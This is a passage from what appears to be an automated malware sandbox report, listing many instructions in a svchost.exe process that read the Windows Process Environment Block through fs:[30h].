            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov ecx, dword ptr fs:[00000030h]1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]1_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]1_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]1_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]1_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h]1_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]1_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]1_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]1_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]1_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]1_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]1_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]1_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]1_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]1_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]1_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]1_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]1_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]1_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]1_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]1_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]1_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]1_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]1_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]1_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]1_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]1_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]1_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]1_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]1_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]1_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]1_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]1_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]1_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]1_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]1_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]1_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]1_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]1_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]1_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]1_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]1_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]1_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]1_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]1_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]1_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]1_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]1_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]1_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]1_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]1_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]1_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]1_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
